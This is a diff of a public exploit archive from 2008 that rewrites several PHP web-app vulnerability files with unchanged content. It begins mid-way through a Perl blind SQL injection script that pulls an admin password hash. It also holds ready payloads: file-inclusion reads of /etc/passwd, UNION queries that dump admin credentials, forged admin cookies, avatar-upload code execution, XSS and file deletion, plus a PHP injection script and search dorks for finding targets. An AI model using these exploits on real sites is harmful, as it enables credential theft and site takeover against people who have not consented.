+  exit;
+}
+
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $cid     = $ARGV[2];
+my $pid     = $ARGV[3];
+
+my %options = ();
+GetOptions(\%options, "c=i", "x=s", "p=i");
+
+print "[~] Exploiting...\n";
+
+if($options{"c"})
+{
+  $cid = $options{"c"};
+}
+
+if($options{"p"})
+{
+  $pid = $options{"p"};
+}
+
+syswrite(STDOUT, "[~] MD5-Hash: ", 14);
+
+for(my $i = 1; $i <= 32; $i++)
+{
+  my $f = 0;
+  my $h = 48;
+  while(!$f && $h <= 57)
+  {
+    if(istrue2($host, $path, $cid, $pid, $i, $h))
+    {
+      $f = 1;
+      syswrite(STDOUT, chr($h), 1);
+    }
+    $h++;
+  }
+  if(!$f)
+  {
+    $h = 97;
+    while(!$f && $h <= 122)
+    {
+      if(istrue2($host, $path, $cid, $pid, $i, $h))
+      {
+        $f = 1;
+        syswrite(STDOUT, chr($h), 1);
+      }
+      $h++;
+    }
+  }
+}
+
+print "\n[~] Exploiting done\n";
+
+sub istrue2
+{
+  my $host  = shift;
+  my $path  = shift;
+  my $cid   = shift;
+  my $pid   = shift;
+  my $i     = shift;
+  my $h     = shift;
+ 
+  my $ua = LWP::UserAgent->new;
+  my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
+ 
+  if($options{"x"})
+  {
+    $ua->proxy('http', "http://".$options{"x"});
+  }
+ 
+  my $resp = $ua->get($query);
+  my $content = $resp->content;
+  my $regexp = "viewcategory&catid=".$cid."";
+ 
+  if($content =~ /$regexp/)
+  {
+    return 1;
+  }
+  else
+  {
+    return 0;
+  }
+
+}
+
+# milw0rm.com [2008-08-03]
diff --git a/platforms/php/webapps/6200.txt b/platforms/php/webapps/6200.txt
index 207e89e0e..354e6ffb5 100755
--- a/platforms/php/webapps/6200.txt
+++ b/platforms/php/webapps/6200.txt
@@ -1,17 +1,17 @@
-######################################
-[+] syzygyCMS 0.3 Local File Inclusion    
-[+] Discovered By SirGod                           
-[+] www.mortal-team.com                           
-[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin
-[+] also ToxicBlood,MesSiAH,xZu
-######################################
-
-Example :
-
-http://localhost/x/index.php?page=../../../autoexec.bat
-
-This will open autoexec.bat .
-
-###########################################
-
-# milw0rm.com [2008-08-03]
+######################################
+[+] syzygyCMS 0.3 Local File Inclusion    
+[+] Discovered By SirGod                           
+[+] www.mortal-team.com                           
+[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin
+[+] also ToxicBlood,MesSiAH,xZu
+######################################
+
+Example :
+
+http://localhost/x/index.php?page=../../../autoexec.bat
+
+This will open autoexec.bat .
+
+###########################################
+
+# milw0rm.com [2008-08-03]
diff --git a/platforms/php/webapps/6203.txt b/platforms/php/webapps/6203.txt
index fc63cf558..5bebfe0f2 100755
--- a/platforms/php/webapps/6203.txt
+++ b/platforms/php/webapps/6203.txt
@@ -1,52 +1,52 @@
-             ########################################################################
-             #                                                                      #
-             #     ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::...     #           
-             ########################################################################
-
-Virangar Security Team
-
-www.virangar.net
-
---------
-Discoverd By :Virangar Security Team (hadihadi)
-
-special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
-
-& all virangar members & all iranian hackerz
-
-greetz:to my best friend in the world hadi_aryaie2004
-& my lovely friend arash(imm02tal) from ISCN
------------------------------------
-Download: http://www.dayfoxdesigns.co.nr
-Dork:Powered by Dayfox Designs This is a port of WordPress  
--------------------------------------------------------------------------------------------------
-vuln codes in index.php:
-############line 140-144##################
-if (isset($_GET["cat"])) {
-    $page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt';
-        if (file_exists($page)) {
-            echo "
    < Back";
-            @include ("$page");
-############line 173-178###################
-if (isset($_GET["p"])) {
-    $page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt';
-    $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt';
-        if (file_exists($page)) {
-        echo '
    < Back';
-          include ("$page");
-############line 209-213##################
-if (isset($_GET["archive"])) {
-    $page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt';
-        if (file_exists($page)) {
-        echo '
    < Back';
-          include ("$page");
-----------------------------------------------------------------------------------------------------
-
-exploit:
-http://site.com/index.php?p=../../../../../../../etc/passwd%00        
-http://site.com/index.php?cat=../../../../../../../etc/passwd%00
-http://site.com/index.php?archive=../../../../../../../etc/passwd%00
---------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-08-04]
+             ########################################################################
+             #                                                                      #
+             #     ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::...     #           
+             ########################################################################
+
+Virangar Security Team
+
+www.virangar.net
+
+--------
+Discoverd By :Virangar Security Team (hadihadi)
+
+special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
+
+& all virangar members & all iranian hackerz
+
+greetz:to my best friend in the world hadi_aryaie2004
+& my lovely friend arash(imm02tal) from ISCN
+-----------------------------------
+Download: http://www.dayfoxdesigns.co.nr
+Dork:Powered by Dayfox Designs This is a port of WordPress  
+-------------------------------------------------------------------------------------------------
+vuln codes in index.php:
+############line 140-144##################
+if (isset($_GET["cat"])) {
+    $page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt';
+        if (file_exists($page)) {
+            echo "
    < Back";
+            @include ("$page");
+############line 173-178###################
+if (isset($_GET["p"])) {
+    $page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt';
+    $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt';
+        if (file_exists($page)) {
+        echo '
    < Back';
+          include ("$page");
+############line 209-213##################
+if (isset($_GET["archive"])) {
+    $page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt';
+        if (file_exists($page)) {
+        echo '
    < Back';
+          include ("$page");
+----------------------------------------------------------------------------------------------------
+
+exploit:
+http://site.com/index.php?p=../../../../../../../etc/passwd%00        
+http://site.com/index.php?cat=../../../../../../../etc/passwd%00
+http://site.com/index.php?archive=../../../../../../../etc/passwd%00
+--------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-08-04]
diff --git a/platforms/php/webapps/6204.txt b/platforms/php/webapps/6204.txt
index a7823dfb5..a1b597edc 100755
--- a/platforms/php/webapps/6204.txt
+++ b/platforms/php/webapps/6204.txt
@@ -1,119 +1,119 @@
-##########################################################
-# GulfTech Security Research              August 05, 2008
-##########################################################
-# Vendor : Mike Johnson
-# URL : http://www.plogger.org/
-# Version : Plogger <= 3.0
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-Plogger is a popular online gallery tool written in php that
-allows users to create an online gallery. It is vulnerable to
-SQL Injection issues, which also allow for arbitrary file
-disclosure since certain data from the returned SQL results is
-used as a filename argument when calling file_get_contents().
-Together these issues can be used to completely take over the
-vulnerable Plogger application. All users should upgrade their
-Plogger installations as soon as possible.
-
-
-
-SQL Injection:
-There are a number of SQL Injection issues within plogger. The
-issues can be found in plog-download.php, and plog-remote.php
-As mentioned earlier this issue also allows for the download
-of arbitrary files on the target web server.
-
-elseif($type == "album" || $type == "search"){
-foreach ($checked as $pid){
-    $query = "SELECT * FROM `".TABLE_PREFIX."pictures` WHERE `id`='".$pid."'";
-    $result = run_query($query);
-           
-    while ($row = mysql_fetch_assoc($result)){
-    $file_contents = file_get_contents("images/".$row["path"], true);
-    $zipfile -> add_file($file_contents, $row["path"]);
-    }
-    }
-}
-
-The above code comes from plog-download.php @ lines 285-297
-and shows how both SQL Injection and arbitrary file access are
-possible via the same flaw. The "checked" variable is taken
-directly from $_REQUEST['checked'] and never get's sanitized.
-The issues in plog-remote.php are similar and basically come
-down to the various commands sending unsanitized gpc variables
-to the get_album_by_name() function. The only commands within
-plog-remote.php that are not vuln are "fetch-albums" and "login"
-
-/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat
-(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0
-,0,0 FROM plogger_config/*
-
-The above url would successfully download the admin credentials
-in the form of a zip file. To read arbitrary files on the server
-vs reading admin credentials an attacker simply need to supply
-the relative location of a file on the webserver in place of the
-data in the first column of the union select above. It is also
-worth mentioning that once an attacker has admin access, executing
-arbitrary code is very much possible by updating the "theme_dir"
-settings in the database to include an arbitrary path to an
-uploaded image, that is terminated with a null byte.
-
-// insert into database
-$new_theme_dir = basename($_REQUEST["activate"]);
-$metafile = $config['basedir'] . '/themes/' . $new_theme_dir . '/meta.php';
-if (file_exists($metafile)) {
-    include($metafile);
-    $sql = 'UPDATE '.TABLE_PREFIX.'config SET `theme_dir` = \''.$new_theme_dir.'\'';
-    $name = $theme_name . ' ' . $version;
-    if (mysql_query($sql)) {
-        $output .= '
    ' . sprintf(plog_tr("Activated New Theme
-        %s"),$name). '
    ';
-    } else {
-        $output .= '
    ' . plog_tr("Error Activating Theme!") . '
    ';
-    };
-
-    // update config variable if page doesn't refresh
-    $config["theme_dir"] = $new_theme_dir;
-} else {
-        $output .= '
    ' . plog_tr("No such theme") . '
    ';
-};
-
-The above code comes from /admin/plog-themes.php @ lines 40-57 and
-shows a possible avenue for attackers to use in order to update the
-'theme_dir' in the database. The only trick to this is we have make
-the "activate" parameter pass both the file_exists() check, the
-basename() check, and still have it update the "theme"dir" data in
-the database with our arbitrary file path.
-
-/admin/plog-themes.php?activate=%00', `theme_dir` = concat
-(feed_title,char(0)) -- *
-
-The above url will successfully copy the data that is contained
-within the "feed_title" column in the database to the "theme_dir"
-column, while at the same time passing both sanity checks. The
-"feed_title" column can be updated from the main administrative
-options and gladly accepts our arbitrary traversed file path leading
-to the image file containing malicious php code. Since the first byte
-of our "activate" parameter contains a null byte the file_exists()
-check only sees "/themes/" as the path, instead of the data contained
-in the "activate" parameter, and thus passes the file_exists() check.
-I terminate the above query with " -- " vs "/*" since the basename()
-function will cause problems if we terminate the query this way due
-to the backslash that would be used in the query termination.
-
-
-
-Solution:
-Fixes for the issues mentioned in this advisory are already available
-via the Plogger public SVN, and a new version of Plogger which also
-addresses these issues will be available later in the week.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-# milw0rm.com [2008-08-05]
+##########################################################
+# GulfTech Security Research              August 05, 2008
+##########################################################
+# Vendor : Mike Johnson
+# URL : http://www.plogger.org/
+# Version : Plogger <= 3.0
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+Plogger is a popular online gallery tool written in php that
+allows users to create an online gallery. It is vulnerable to
+SQL Injection issues, which also allow for arbitrary file
+disclosure since certain data from the returned SQL results is
+used as a filename argument when calling file_get_contents().
+Together these issues can be used to completely take over the
+vulnerable Plogger application. All users should upgrade their
+Plogger installations as soon as possible.
+
+
+
+SQL Injection:
+There are a number of SQL Injection issues within plogger. The
+issues can be found in plog-download.php, and plog-remote.php
+As mentioned earlier this issue also allows for the download
+of arbitrary files on the target web server.
+
+elseif($type == "album" || $type == "search"){
+foreach ($checked as $pid){
+    $query = "SELECT * FROM `".TABLE_PREFIX."pictures` WHERE `id`='".$pid."'";
+    $result = run_query($query);
+           
+    while ($row = mysql_fetch_assoc($result)){
+    $file_contents = file_get_contents("images/".$row["path"], true);
+    $zipfile -> add_file($file_contents, $row["path"]);
+    }
+    }
+}
+
+The above code comes from plog-download.php @ lines 285-297
+and shows how both SQL Injection and arbitrary file access are
+possible via the same flaw. The "checked" variable is taken
+directly from $_REQUEST['checked'] and never get's sanitized.
+The issues in plog-remote.php are similar and basically come
+down to the various commands sending unsanitized gpc variables
+to the get_album_by_name() function. The only commands within
+plog-remote.php that are not vuln are "fetch-albums" and "login"
+
+/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat
+(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0
+,0,0 FROM plogger_config/*
+
+The above url would successfully download the admin credentials
+in the form of a zip file. To read arbitrary files on the server
+vs reading admin credentials an attacker simply need to supply
+the relative location of a file on the webserver in place of the
+data in the first column of the union select above. It is also
+worth mentioning that once an attacker has admin access, executing
+arbitrary code is very much possible by updating the "theme_dir"
+settings in the database to include an arbitrary path to an
+uploaded image, that is terminated with a null byte.
+
+// insert into database
+$new_theme_dir = basename($_REQUEST["activate"]);
+$metafile = $config['basedir'] . '/themes/' . $new_theme_dir . '/meta.php';
+if (file_exists($metafile)) {
+    include($metafile);
+    $sql = 'UPDATE '.TABLE_PREFIX.'config SET `theme_dir` = \''.$new_theme_dir.'\'';
+    $name = $theme_name . ' ' . $version;
+    if (mysql_query($sql)) {
+        $output .= '
    ' . sprintf(plog_tr("Activated New Theme
+        %s"),$name). '
    ';
+    } else {
+        $output .= '
    ' . plog_tr("Error Activating Theme!") . '
    ';
+    };
+
+    // update config variable if page doesn't refresh
+    $config["theme_dir"] = $new_theme_dir;
+} else {
+        $output .= '
    ' . plog_tr("No such theme") . '
    ';
+};
+
+The above code comes from /admin/plog-themes.php @ lines 40-57 and
+shows a possible avenue for attackers to use in order to update the
+'theme_dir' in the database. The only trick to this is we have make
+the "activate" parameter pass both the file_exists() check, the
+basename() check, and still have it update the "theme"dir" data in
+the database with our arbitrary file path.
+
+/admin/plog-themes.php?activate=%00', `theme_dir` = concat
+(feed_title,char(0)) -- *
+
+The above url will successfully copy the data that is contained
+within the "feed_title" column in the database to the "theme_dir"
+column, while at the same time passing both sanity checks. The
+"feed_title" column can be updated from the main administrative
+options and gladly accepts our arbitrary traversed file path leading
+to the image file containing malicious php code. Since the first byte
+of our "activate" parameter contains a null byte the file_exists()
+check only sees "/themes/" as the path, instead of the data contained
+in the "activate" parameter, and thus passes the file_exists() check.
+I terminate the above query with " -- " vs "/*" since the basename()
+function will cause problems if we terminate the query this way due
+to the backslash that would be used in the query termination.
+
+
+
+Solution:
+Fixes for the issues mentioned in this advisory are already available
+via the Plogger public SVN, and a new version of Plogger which also
+addresses these issues will be available later in the week.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+# milw0rm.com [2008-08-05]
diff --git a/platforms/php/webapps/6205.txt b/platforms/php/webapps/6205.txt
index 57b5ae736..ecdb355d2 100755
--- a/platforms/php/webapps/6205.txt
+++ b/platforms/php/webapps/6205.txt
@@ -1,62 +1,62 @@
-########################## www.BugReport.ir #######################################
-#
-#        AmnPardaz Security Research Team
-#
-# Title: IGES CMS <=2.0 Multiple Vulnerabilities
-# Vendor: www.iges.nl
-# Exploit: Available
-# Vulnerable Version: 2.0
-# Impact: High
-# Fix: N/A
-###################################################################################
-
-####################
-1. Description:
-####################
-
-    IGES CMS is a complete, fully featured CMS in PHP language with SQL and became a powerful CMS having plenty of strong modules.
-    This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites.
-
-####################
-2. Vulnerabilities:
-####################
-
-    2.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
-        2.1.1. Exploit:
-                        Check the exploit/POC section.
-    2.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
-        2.2.1. Exploit:
-                        Check the exploit/POC section.
-
-####################
-3. Exploits/POCs:
-####################
-
-1. Exploits/POCs:
-	1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
-		-------------
-		Find Admin's password:
-		http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
-		http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*
-		-------------
-		1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
-		-------------
-		http://[URL]/links.php?cat=
-		-------------
-
-####################
-4. Solution:
-####################
-
-    Edit the source code to ensure that inputs are properly sanitized.
-
-####################
-5. Credit:
-####################
-
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-08-05]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title: IGES CMS <=2.0 Multiple Vulnerabilities
+# Vendor: www.iges.nl
+# Exploit: Available
+# Vulnerable Version: 2.0
+# Impact: High
+# Fix: N/A
+###################################################################################
+
+####################
+1. Description:
+####################
+
+    IGES CMS is a complete, fully featured CMS in PHP language with SQL and became a powerful CMS having plenty of strong modules.
+    This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites.
+
+####################
+2. Vulnerabilities:
+####################
+
+    2.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
+        2.1.1. Exploit:
+                        Check the exploit/POC section.
+    2.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
+        2.2.1. Exploit:
+                        Check the exploit/POC section.
+
+####################
+3. Exploits/POCs:
+####################
+
+1. Exploits/POCs:
+	1.1. Injection Flaws. SQL Injection in "/news.php" or "/news_body.php" in "news_id" parameter.
+		-------------
+		Find Admin's password:
+		http://[URL]/news.php?news_id=65 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12 from users/*
+		http://[URL]/news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users/*
+		-------------
+		1.2. Cross Site Scripting (XSS). Reflected XSS attack in "/links.php" in "cat" parameter.
+		-------------
+		http://[URL]/links.php?cat=
+		-------------
+
+####################
+4. Solution:
+####################
+
+    Edit the source code to ensure that inputs are properly sanitized.
+
+####################
+5. Credit:
+####################
+
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-08-05]
diff --git a/platforms/php/webapps/6206.txt b/platforms/php/webapps/6206.txt
index 4ee0c65b7..21ed367d2 100755
--- a/platforms/php/webapps/6206.txt
+++ b/platforms/php/webapps/6206.txt
@@ -1,33 +1,33 @@
-#########################################################################
-#                                                                       #
-#         litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability     #
-#                                                                       #
-#########################################################################
-#                                                                       #
-# AUTHOR     : Scary-Boys						#
-# HOME       : http://scary-boys.com					#
-# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
-#                                                                       #
-#########################################################################
-#                                                                       #
-#     DorKs  : "Powered By litenews"         			        #
-#                                                                       #
-#########################################################################
-#                                                                       #
-#  DESCRIPTION :                                        		#
-#  Maian Guestbook suffers from a insecure cookie                       #
-# the admin panel only checks if the cookie exists. 		        #
-#                                                                       #
-#########################################################################
-#                                                                       #
-#  Vulnerability :                                                      #
-#                                                                       #
-#  javascript:document.cookie = "admin=1; path=/";                      #
-#                                                                       #
-#########################################################################
-#                                                                       #
-# after running the javascript, Go to "/admin/index.php" & Refresh      #
-#                                                                       #
-#########################################################################
-
-# milw0rm.com [2008-08-05]
+#########################################################################
+#                                                                       #
+#         litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability     #
+#                                                                       #
+#########################################################################
+#                                                                       #
+# AUTHOR     : Scary-Boys						#
+# HOME       : http://scary-boys.com					#
+# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
+#                                                                       #
+#########################################################################
+#                                                                       #
+#     DorKs  : "Powered By litenews"         			        #
+#                                                                       #
+#########################################################################
+#                                                                       #
+#  DESCRIPTION :                                        		#
+#  Maian Guestbook suffers from a insecure cookie                       #
+# the admin panel only checks if the cookie exists. 		        #
+#                                                                       #
+#########################################################################
+#                                                                       #
+#  Vulnerability :                                                      #
+#                                                                       #
+#  javascript:document.cookie = "admin=1; path=/";                      #
+#                                                                       #
+#########################################################################
+#                                                                       #
+# after running the javascript, Go to "/admin/index.php" & Refresh      #
+#                                                                       #
+#########################################################################
+
+# milw0rm.com [2008-08-05]
diff --git a/platforms/php/webapps/6207.txt b/platforms/php/webapps/6207.txt
index dfb2034f8..e4083563e 100755
--- a/platforms/php/webapps/6207.txt
+++ b/platforms/php/webapps/6207.txt
@@ -1,12 +1,12 @@
-litenews-01 <= 1.2 Remote sql injection
-# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
-#                                                                                   #
-#Injection Adress :  http://Sitename/litenew//index.php?mode=view&id=   code sql
-
-you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17
-
-C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870
-
-http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/*
-
-# milw0rm.com [2008-08-05]
+litenews-01 <= 1.2 Remote sql injection
+# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
+#                                                                                   #
+#Injection Adress :  http://Sitename/litenew//index.php?mode=view&id=   code sql
+
+you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17
+
+C:\AppServ\www\litenew\settings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870
+
+http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/*
+
+# milw0rm.com [2008-08-05]
diff --git a/platforms/php/webapps/6208.txt b/platforms/php/webapps/6208.txt
index 429a20016..274153c94 100755
--- a/platforms/php/webapps/6208.txt
+++ b/platforms/php/webapps/6208.txt
@@ -1,19 +1,19 @@
-Author: otmorozok428, http://forum.antichat.ru 
-
-Products: Wsn Forum <= 4.1.43, Wsn Knowledge Base <= 4.1.36, Wsn Links <= 4.1.44, Wsn Gallery <= 4.1.30
-
-Vendor: http://www.webmastersite.net
-
-Googling: inurl:memberlist.php?action=profile
-
-Code Execution Vulnerability: 
-
-Avatar evil.jpg source: 
-
-Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID]
-
-See the avatar name at your profile.
-
-Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al
-
-# milw0rm.com [2008-08-06]
+Author: otmorozok428, http://forum.antichat.ru 
+
+Products: Wsn Forum <= 4.1.43, Wsn Knowledge Base <= 4.1.36, Wsn Links <= 4.1.44, Wsn Gallery <= 4.1.30
+
+Vendor: http://www.webmastersite.net
+
+Googling: inurl:memberlist.php?action=profile
+
+Code Execution Vulnerability: 
+
+Avatar evil.jpg source: 
+
+Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID]
+
+See the avatar name at your profile.
+
+Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al
+
+# milw0rm.com [2008-08-06]
diff --git a/platforms/php/webapps/6213.txt b/platforms/php/webapps/6213.txt
index 675b8b3d4..42e589f51 100755
--- a/platforms/php/webapps/6213.txt
+++ b/platforms/php/webapps/6213.txt
@@ -1,33 +1,33 @@
-#########################################################################
-#                                                                       #
-#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
-#                                                                       #
-#########################################################################
-#                                                                       #
-# AUTHOR     : Scary-Boys                                               #
-# HOME       : http://scary-boys.com                                    #
-# Founded By : lvlr-Erfan                                               #
-# Download   : http://www.fhm-script.com/download.php                   #
-#                                                                       #
-#########################################################################
-#                                                                       #
-#     DorKs  : "Powered By Free Hosting Manager"                        #
-#                                                                       #
-#########################################################################
-#                                                                       #
-#  DESCRIPTION :                                                        #
-# the admin panel only checks if the cookie exists.                     #
-#                                                                       #
-#########################################################################
-#                                                                       #
-#  Vulnerability :                                                      #
-#                                                                       #
-#  javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
-#                                                                       #
-#########################################################################
-#                                                                       #
-# after running the javascript, Go to "/admin" & Refresh      #
-#                                                                       #
-#########################################################################
-
-# milw0rm.com [2008-08-06]
+#########################################################################
+#                                                                       #
+#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
+#                                                                       #
+#########################################################################
+#                                                                       #
+# AUTHOR     : Scary-Boys                                               #
+# HOME       : http://scary-boys.com                                    #
+# Founded By : lvlr-Erfan                                               #
+# Download   : http://www.fhm-script.com/download.php                   #
+#                                                                       #
+#########################################################################
+#                                                                       #
+#     DorKs  : "Powered By Free Hosting Manager"                        #
+#                                                                       #
+#########################################################################
+#                                                                       #
+#  DESCRIPTION :                                                        #
+# the admin panel only checks if the cookie exists.                     #
+#                                                                       #
+#########################################################################
+#                                                                       #
+#  Vulnerability :                                                      #
+#                                                                       #
+#  javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
+#                                                                       #
+#########################################################################
+#                                                                       #
+# after running the javascript, Go to "/admin" & Refresh      #
+#                                                                       #
+#########################################################################
+
+# milw0rm.com [2008-08-06]
diff --git a/platforms/php/webapps/6214.php b/platforms/php/webapps/6214.php
index ab9a4d7d4..c399cda7c 100755
--- a/platforms/php/webapps/6214.php
+++ b/platforms/php/webapps/6214.php
@@ -1,51 +1,51 @@
-=5 & mysql>=4.1
-BY  james
-+------------------------------------------------------------------+
-");
-
-if($argc>4)
-{
- $host=$argv[1];
- $port=$argv[2];
- $path=$argv[3];
- $uid=$argv[4];
-}else{
- echo "Usage: php ".$argv[0]." host port path uid\n";
- echo "host:      target server \n";
- echo "port:      the web port, usually 80\n";
- echo "path:      path to discuz\n";
- echo "uid :      user ID you wanna get\n";
- echo "Example:\r\n";
- echo "php ".$argv[0]." localhost 80 1\n";
- exit;
-}
-
-$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";
-
-$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
-$data .= "Accept: */*\r\n";
-$data .= "Accept-Language: zh-cn\r\n";
-$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$data .= "User-Agent: wap\r\n";
-$data .= "Host: ".$host."\r\n";
-$data .= "Content-length: ".strlen($content)."\r\n";
-$data .= "Connection: Close\r\n";
-$data .= "\r\n";
-$data .= $content."\r\n\r\n";
-$ock=fsockopen($host,$port);
-if (!$ock) {
- echo 'No response from '.$host;
- die;
-}
-fwrite($ock,$data);
-while (!feof($ock)) {
-   echo fgets($ock, 1024);
-}
-?>
-
-# milw0rm.com [2008-08-06]
+=5 & mysql>=4.1
+BY  james
++------------------------------------------------------------------+
+");
+
+if($argc>4)
+{
+ $host=$argv[1];
+ $port=$argv[2];
+ $path=$argv[3];
+ $uid=$argv[4];
+}else{
+ echo "Usage: php ".$argv[0]." host port path uid\n";
+ echo "host:      target server \n";
+ echo "port:      the web port, usually 80\n";
+ echo "path:      path to discuz\n";
+ echo "uid :      user ID you wanna get\n";
+ echo "Example:\r\n";
+ echo "php ".$argv[0]." localhost 80 1\n";
+ exit;
+}
+
+$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";
+
+$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
+$data .= "Accept: */*\r\n";
+$data .= "Accept-Language: zh-cn\r\n";
+$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$data .= "User-Agent: wap\r\n";
+$data .= "Host: ".$host."\r\n";
+$data .= "Content-length: ".strlen($content)."\r\n";
+$data .= "Connection: Close\r\n";
+$data .= "\r\n";
+$data .= $content."\r\n\r\n";
+$ock=fsockopen($host,$port);
+if (!$ock) {
+ echo 'No response from '.$host;
+ die;
+}
+fwrite($ock,$data);
+while (!feof($ock)) {
+   echo fgets($ock, 1024);
+}
+?>
+
+# milw0rm.com [2008-08-06]
diff --git a/platforms/php/webapps/6215.txt b/platforms/php/webapps/6215.txt
index d18b9cba6..ff98a1306 100755
--- a/platforms/php/webapps/6215.txt
+++ b/platforms/php/webapps/6215.txt
@@ -1,44 +1,44 @@
-##########################################################
-#Author : BeyazKurt
-#Contact : Djm-sut@Hotmail.Com
-#
-#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
-#Download : http://scripts.ringsworld.com/organizers/ppim.zip
-#
-# D0rk :  inurl:events.php?listallevents
-#
-# File Delete Vulnerability: upload.php
-#
-# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
-# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
-#
-# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
-#
-# XSS Vulnerability: events.php
-#
-#[CODE]
-#  New Event
    ";
-#  }
-#  ?>
-#[/CODE]
-#
-#Exploit :
-# events.php?mode=new&date=XSS CODE
-# events.php?mode=new&date=">
-# -------------------------------
-#
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#  pigs for dedication : :  WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-#                      Proud 2 Be ALBANIAN
-#
-# MTK : 0 - 5 : FenerBahçe (H)
-#
-# Not : Fuck off pala! aq lameri.
-# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
-#######################################################
-
-# milw0rm.com [2008-08-10]
+##########################################################
+#Author : BeyazKurt
+#Contact : Djm-sut@Hotmail.Com
+#
+#Script : Ppim v1.0 [Bu ne bicim script adidir amk :D ]
+#Download : http://scripts.ringsworld.com/organizers/ppim.zip
+#
+# D0rk :  inurl:events.php?listallevents
+#
